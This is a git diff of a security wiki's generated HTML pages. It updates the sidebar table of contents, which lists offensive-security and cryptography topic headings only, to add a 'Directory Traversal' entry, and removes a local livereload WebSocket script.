        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -183,22 +183,6 @@

- - diff --git a/docs/Reconnaissance/OSINT/Domain Name Enumeration.html b/docs/Reconnaissance/OSINT/Domain Name Enumeration.html index c7e9c18e..3e491455 100644 --- a/docs/Reconnaissance/OSINT/Domain Name Enumeration.html +++ b/docs/Reconnaissance/OSINT/Domain Name Enumeration.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -309,22 +309,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Reconnaissance/OSINT/Google Dorks.html b/docs/Reconnaissance/OSINT/Google Dorks.html index afe54f74..e8691b2f 100644 --- a/docs/Reconnaissance/OSINT/Google Dorks.html +++ b/docs/Reconnaissance/OSINT/Google Dorks.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
